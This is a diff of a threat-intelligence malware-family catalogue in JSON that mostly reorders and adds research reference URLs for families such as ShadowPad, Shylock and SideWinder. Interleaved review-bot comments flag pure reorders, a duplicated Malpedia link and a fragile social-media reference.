"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/", - "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", - 
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", + "https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware", - "https://intel471.com/blog/a-brief-history-of-ta505", - "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56" + "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/", + "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners", + "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56", + 
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [], "type": [] 
@@ -43522,22 +45568,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer", - "https://blog.reversinglabs.com/blog/forging-the-shadowhammer", + "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/", + "https://www.youtube.com/watch?v=T5wPwvLrBYU", + "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/", + "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/", + "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://blog.reversinglabs.com/blog/forging-the-shadowhammer", "https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://securelist.com/operation-shadowhammer/89992/", + "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", "https://mauronz.github.io/shadowhammer-backdoor", "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/", - "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html", "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", - "https://www.youtube.com/watch?v=T5wPwvLrBYU", - "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html", "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", - "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/", - "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/", - "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/", - "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/" + 
"https://securelist.com/operation-shadowhammer/89992/" ], "synonyms": [ "DAYJOB" 
@@ -43552,60 +45598,63 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", - "https://attack.mitre.org/groups/G0096", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://www.secureworks.com/research/shadowpad-malware-analysis", "https://community.riskiq.com/article/d8b749f2", - "https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html", - "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", - "https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", - "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", - "https://www.youtube.com/watch?v=55kaaMGBARM", - "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", - "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", - "https://www.ic3.gov/Media/News/2021/211220.pdf", - "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", - "https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/", - "https://securelist.com/shadowpad-in-corporate-networks/81432/", - "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", - "https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/", - 
"https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/", - "https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf", - "https://www.youtube.com/watch?v=r1zAVX_HnJg", - "https://www.youtube.com/watch?v=IRh6R8o1Q7U", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", - "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", - "https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/", - "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", - "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns", - "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", "https://www.youtube.com/watch?v=_fstHQSK-kk", - "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", - 
"https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", - "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", - "https://research.nccgroup.com/2022/09/30/a-glimpse-into-the-shadowy-realm-of-a-chinese-apt-detailed-analysis-of-a-shadowpad-intrusion/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", - "https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html", + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", + "https://www.ic3.gov/Media/News/2021/211220.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://research.nccgroup.com/2022/09/30/a-glimpse-into-the-shadowy-realm-of-a-chinese-apt-detailed-analysis-of-a-shadowpad-intrusion/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf", + "https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html", "https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf", + "https://www.secureworks.com/research/shadowpad-malware-analysis", + 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", + "https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf", + "https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2", + "https://www.youtube.com/watch?v=r1zAVX_HnJg", + "https://www.welivesecurity.com/2022/09/06/worok-big-picture/", + "https://securelist.com/shadowpad-in-corporate-networks/81432/", + "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", + "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf", + "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", + "https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html", + "https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/", + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", - "https://www.welivesecurity.com/2022/09/06/worok-big-picture/" + "https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", + "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/", + 
"https://attack.mitre.org/groups/G0096", + "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", + "https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/", + "https://www.youtube.com/watch?v=IRh6R8o1Q7U", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", + "https://www.youtube.com/watch?v=55kaaMGBARM", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor", + "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", + "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", + "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", + "https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf", + 
"https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html", + "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "POISONPLUG.SHADOW", @@ -43621,8 +45670,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/" ], "synonyms": [], "type": [] @@ -43663,8 +45712,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shark", - "https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/", - "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf" + "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf", + "https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/" ], "synonyms": [], "type": [] 
@@ -43715,7 +45764,7 @@ "value": "SharpMapExec" }, { - "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called “Stage_One”. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ", + "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called \u201cStage_One\u201d. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage", 
@@ -43778,11 +45827,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", - "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/", - "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan", + "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/", "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], @@ -43797,8 +45846,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", - "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-walker" + "https://www.secureworks.com/research/threat-profiles/bronze-walker", + "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" ], "synonyms": [], "type": [] 
@@ -43811,8 +45860,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -43852,14 +45901,15 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock",
 "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware",
+ "https://www.zscaler.com/blogs/security-research/new-wave-win32caphaw-attacks-threatlabz-analysis",
+ "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html",
+ "https://www.welivesecurity.com/2013/02/25/caphaw-attacking-major-european-banks-with-webinject-plugin/",
 "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw",
 "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/",
- "https://www.zscaler.com/blogs/security-research/new-wave-win32caphaw-attacks-threatlabz-analysis",
 "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/",
- "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
 "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/",
- "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html"
+ "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware"
 ],
 "synonyms": [
 "Caphaw"
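Review bot: Almost all of the Shylock hunk is reordering of references that already existed; the only real addition is the welivesecurity CAPHAW link, and a reader has to diff the array by hand to find it. The shipshape hunk above it and the shakti, shark, shifu, shimrat, sidewalk, sienna_blue, sienna_purple, silon, simda, sinowal, sisfader, skimer, skipper, slingshot, slub, smac and smokedham hunks on this page are pure reorders with no content change at all. Sorting each `refs` array deterministically in the generator before serializing would make regenerations diff only on genuine additions and removals and make this cluster reviewable.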
@@ -43874,7 +45924,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidetwist", - "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/", + "https://nsfocusglobal.com/apt34-unleashes-new-wave-of-phishing-attack-with-variant-of-sidetwist-trojan/" ], "synonyms": [], "type": [] @@ -43887,9 +45938,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware", "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", - "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware" + "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf" ], "synonyms": [ "ScrambleCross" 
@@ -43904,15 +45955,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder",
- "https://www.secrss.com/articles/26507",
- "https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/",
- "https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c",
 "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/",
- "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
- "https://s.tencent.com/research/report/659.html",
+ "https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c",
 "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
+ "https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder",
+ "https://s.tencent.com/research/report/479.html",
+ "https://s.tencent.com/research/report/659.html",
 "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c",
- "https://s.tencent.com/research/report/479.html"
+ "https://www.secrss.com/articles/26507"
 ],
 "synonyms": [],
 "type": []
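Review bot: The added line `"https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder"` duplicates the first element of the same `refs` array, which is kept as context at the top of the hunk, so the SideWinder entry now lists its Malpedia page twice and the hunk's one net addition is this duplicate. Dropping the added line restores the previous content; deduplicating `refs` in the generator and adding a per-entry uniqueness check to the cluster validation would stop this class of issue from reaching the repository.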
@@ -43926,8 +45978,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_blue", "https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware", - "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/", - "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF" + "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", + "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/" ], "synonyms": [ "H0lyGh0st", @@ -43944,8 +45996,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple", "https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware", - "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/", - "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF" + "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", + "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/" ], "synonyms": [ "H0lyGh0st", 
@@ -43961,15 +46013,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware", "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4", - "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks", - "https://www.us-cert.gov/ncas/alerts/TA14-353A", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.secureworks.com/research/threat-profiles/nickel-academy", - "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware" + "https://www.us-cert.gov/ncas/alerts/TA14-353A", + "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", + "https://www.anomali.com/blog/evidence-of-stronger-ties-between-north-korea-and-swift-banking-attacks", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" ], "synonyms": [ "Destover" 
@@ -43984,9 +46038,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.siesta_graph",
- "https://www.elastic.co/de/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph",
+ "https://x.com/threatintel/status/1701259256199090217",
+ "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns",
 "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry",
- "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns"
+ "https://www.elastic.co/de/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph"
 ],
 "synonyms": [],
 "type": []
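Review bot: The added reference `"https://x.com/threatintel/status/1701259256199090217"` is a social-media post, one of the least durable source types in a threat-intel cluster; such links commonly vanish or end up behind a login. The dataset already preserves fragile sources through `web.archive.org` snapshots (the Shylock and Sierras hunks on this page carry several), so recording an archived copy alongside or instead of the live URL would keep this SiestaGraph reference usable. It is also worth confirming that the generator does not emit `twitter.com` for other statuses, so that one host form is used consistently.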
@@ -44037,26 +46092,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", - "https://securelist.com/the-silence/83009/", - "https://github.com/Tera0017/TAFOF-Unpacker", - "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/", - "https://securityintelligence.com/posts/x-force-prevents-zero-day-from-going-anywhere", - "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf", "https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html", - "https://malware.love/malware_analysis/reverse_engineering/2023/02/12/analyzing-truebot-packer.html", - "http://www.intezer.com/silenceofthemoles/", - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits", - "https://malware.love/malware_analysis/reverse_engineering/2023/02/18/analyzing-truebot-static-unpacking.html", - "https://norfolkinfosec.com/some-notes-on-the-silence-proxy/", + "https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf", + "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/", "https://www.youtube.com/watch?v=FttiysUZmDw", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://norfolkinfosec.com/some-notes-on-the-silence-proxy/", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + 
